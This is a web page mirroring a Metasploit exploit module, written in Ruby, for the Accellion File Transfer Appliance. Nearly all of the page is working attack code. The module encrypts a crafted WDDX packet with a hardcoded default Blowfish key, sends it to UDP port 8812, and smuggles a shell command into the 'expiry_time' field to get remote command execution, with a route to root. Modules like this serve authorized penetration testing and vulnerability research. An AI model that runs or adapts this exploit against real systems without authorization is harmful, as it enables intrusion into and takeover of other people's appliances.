Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/misc/accellion_fta_mpipe2.rb
19812 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'openssl'

7
require 'rexml/element'

8


9
class MetasploitModule < Msf::Exploit::Remote

10
  Rank = ExcellentRanking

11


12
  include Msf::Exploit::Remote::Udp

13


14
  def initialize(info = {})

15
    super(

16
      update_info(

17
        info,

18
        'Name' => 'Accellion FTA MPIPE2 Command Execution',

19
        'Description' => %q{

20
          This module exploits a chain of vulnerabilities in the Accellion

21
          File Transfer appliance. This appliance exposes a UDP service on

22
          port 8812 that acts as a gateway to the internal communication bus.

23
          This service uses Blowfish encryption for authentication, but the

24
          appliance ships with two easy to guess default authentication keys.

25
          This module abuses the known default encryption keys to inject a

26
          message into the communication bus. In order to execute arbitrary

27
          commands on the remote appliance, a message is injected into the bus

28
          destined for the 'matchrep' service. This service exposes a function

29
          named 'insert_plugin_meta_info' which is vulnerable to an input

30
          validation flaw in a call to system(). This provides access to the

31
          'soggycat' user account, which has sudo privileges to run the

32
          primary admin tool as root. These two flaws are fixed in update

33
          version FTA_8_0_562.

34
        },

35
        'Author' => [ 'hdm' ],

36
        'License' => MSF_LICENSE,

37
        'References' => [

38
          ['OSVDB', '71362'],

39
          ['OSVDB', '71363'],

40
          ['URL', 'http://www.rapid7.com/security-center/advisories/R7-0039.jsp'],

41
        ],

42
        'Platform' => ['unix'],

43
        'Arch' => ARCH_CMD,

44
        'Privileged' => true,

45
        'Payload' => {

46
          'Space' => 1024,

47
          'DisableNops' => true,

48
          'Compat' =>

49
                        {

50
                          'PayloadType' => 'cmd',

51
                          'RequiredCmd' => 'generic perl ruby telnet',

52
                        }

53
        },

54
        'Targets' => [

55
          [ 'Automatic', {} ]

56
        ],

57
        'DefaultTarget' => 0,

58
        'DisclosureDate' => '2011-02-07',

59
        'Notes' => {

60
          'Reliability' => UNKNOWN_RELIABILITY,

61
          'Stability' => UNKNOWN_STABILITY,

62
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

63
        }

64
      )

65
    )

66


67
    register_options(

68
      [

69
        Opt::RPORT(8812),

70
        OptString.new('APPID', [true, 'The application ID (usually 1000)', '1000'])

71
      ]

72
    )

73
  end

74


75
  def exploit

76
    connect_udp

77


78
    appid = datastore['APPID']

79
    encoded_command = REXML::Text.new(payload.encoded).to_s

80


81
    wddx = %Q|

82
<wddxPacket version='1.0'>

83
<header/>

84
<data>

85
  <struct>

86
    <var name='50001'><string>insert_plugin_meta_info</string></var>

87
    <var name='file_handle'><binary length='9'>MDAwMDAwMDAw</binary></var>

88
    <var name='aid'><string>#{appid}</string></var>

89
    <var name='client_ip'><string>127.0.0.1</string></var>

90
    <var name='package_id'><string>1</string></var>

91
    <var name='recipient_list'><array length='1'><string>#{Rex::Text.rand_text_alphanumeric(8)}</string></array></var>

92
    <var name='expiry_time'><string>&apos;; #{encoded_command}; #&apos;</string></var>

93
  </struct>

94
</data>

95
</wddxPacket>|

96


97
    packet = [

98
      rand(0xffffffff),	# Source Location ID

99
      8888,	# Destination Location ID

100
      rand(0xffff),	# Source Application

101
      50001,	# Destination Application (matchrep)

102
      Time.now.to_i

103
    ].pack("NNnnN") + wddx

104


105
    header = [

106
      0,		# Flags

107
      0,		#

108
      1,		# Sequence Number (must be the lowest seen from Source ID)

109
      33		# Execute (pass message to destination)

110
    ].pack("CCNC") + packet

111


112
    data = [ simple_checksum(header) ].pack("n") + header

113
    enc = blowfish_encrypt("123456789ABCDEF0123456789ABCDEF0", data)

114


115
    udp_sock.put("\x01" + enc)

116


117
    handler

118
    disconnect_udp

119
  end

120


121
  def simple_checksum(data)

122
    sum = 0

123
    data.unpack("C*").map { |c| sum = (sum + c) & 0xffff }

124
    sum

125
  end

126


127
  #

128
  # This implements blowfish-cbc with an MD5-expanded 448-bit key

129
  # using RandomIV for the initial value.

130
  #

131
  def blowfish_encrypt(pass, data)

132
    # Forces 8-bit encoding

133
    pass = pass.unpack("C*").pack("C*")

134
    data = data.unpack("C*").pack("C*")

135


136
    # Use 448-bit keys with 8-byte IV

137
    key_len = 56

138
    iv_len = 8

139


140
    # Expand the key with MD5 (key-generated-key mode)

141
    hash = OpenSSL::Digest::MD5.digest(pass)

142
    while (hash.length < key_len)

143
      hash << OpenSSL::Digest::MD5.digest(hash)

144
    end

145


146
    key = hash[0, key_len]

147
    iv = Rex::Text.rand_text(iv_len)

148


149
    c = OpenSSL::Cipher.new('bf-cbc')

150
    c.encrypt

151
    c.key_len = key_len

152
    c.key = key

153
    c.iv = iv

154


155
    "RandomIV" + iv + c.update(data) + c.final

156
  end

157
end

158


159